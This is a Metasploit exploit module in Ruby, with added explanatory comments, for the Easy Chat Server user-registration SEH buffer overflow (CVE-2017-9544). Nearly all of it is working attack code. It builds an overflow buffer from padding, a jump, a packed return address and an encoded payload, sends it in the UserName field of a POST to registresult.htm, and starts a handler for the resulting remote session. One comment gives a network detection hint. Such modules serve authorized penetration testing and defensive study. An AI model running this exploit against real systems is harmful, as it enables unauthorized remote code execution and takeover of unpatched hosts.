##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Easy Chat Server user-registration buffer overflow (SEH), tracked as
  # CVE-2017-9544 / EDB 42155. The module issues a single POST to
  # registresult.htm whose UserName field carries the oversized value;
  # see #exploit for the exact buffer layout.
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module's metadata with the framework.
  #
  # @param info [Hash] base info hash merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        # NOTE: "Registeration" is a typo in the display name; the string is
        # left verbatim here (documentation-only pass).
        'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
        'Description' => %q{
          This module exploits a buffer overflow during user registration in Easy Chat Server software.
        },
        'Author' => [
          'Marco Rivoli', # Metasploit
          'Aitezaz Mohsin' # POC
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2017-9544' ],
          [ 'EDB', '42155' ],
        ],
        # Presumably indicates the resulting session runs with elevated
        # privileges — framework convention, not verified here.
        'Privileged' => true,
        'Payload' => {
          # Bytes the encoder must avoid. Decoded: NUL, '~', '+', '&', '=', '%',
          # ':', '"', LF, CR, space, '/', '\', '.'. Presumably the set that
          # does not survive a URL-encoded form field — inferred from the
          # values, not verified here.
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
        'Platform' => 'win',
        'Targets' => [
          # Single target; 'Ret' is the 32-bit address that #exploit packs
          # little-endian into the UserName buffer.
          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
        ],
        'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          # Alphanumeric encoder by default; together with the
          # rand_text_alpha_upper padding in #exploit this makes the UserName
          # value mostly printable letters on the wire (detection hint: an
          # unusually long, mostly-alphabetic UserName POSTed to
          # registresult.htm).
          'ENCODER' => 'x86/alpha_mixed'
        },
        'DisclosureDate' => '2017-10-09',
        'DefaultTarget' => 0,
        # Reliability / stability / side-effect ratings were left UNKNOWN_*
        # by the author.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the overflowing UserName value and submits the registration form.
  #
  # Buffer layout, in order:
  #   1. 217 random upper-case letters
  #   2. "\xeb\x06\x90\x90" — four fixed bytes
  #   3. target.ret as a 32-bit little-endian value (pack 'V')
  #   4. the encoded payload
  #   5. 200 random upper-case letters of trailing padding
  #
  # `res` is assigned but never read: the HTTP response is not inspected and
  # `handler` is invoked regardless of it.
  def exploit
    sploit = rand_text_alpha_upper(217)
    sploit << "\xeb\x06\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(200)

    # Only UserName carries the overflow; every other field is a fixed
    # filler value for the remaining form inputs.
    res = send_request_cgi({
      'uri' => normalize_uri(URI, 'registresult.htm'),
      'method' => 'POST',
      'vars_post' => {
        'UserName' => sploit,
        'Password' => 'test',
        'Password1' => 'test',
        'Sex' => 1,
        'Email' => 'x@',
        'Icon' => 'x.gif',
        'Resume' => 'xxxx',
        'cw' => 1,
        'RoomID' => 4,
        'RepUserName' => 'admin',
        'submit1' => 'Register'
      }
    })
    # Start the payload handler unconditionally (no response check above).
    handler
  end
end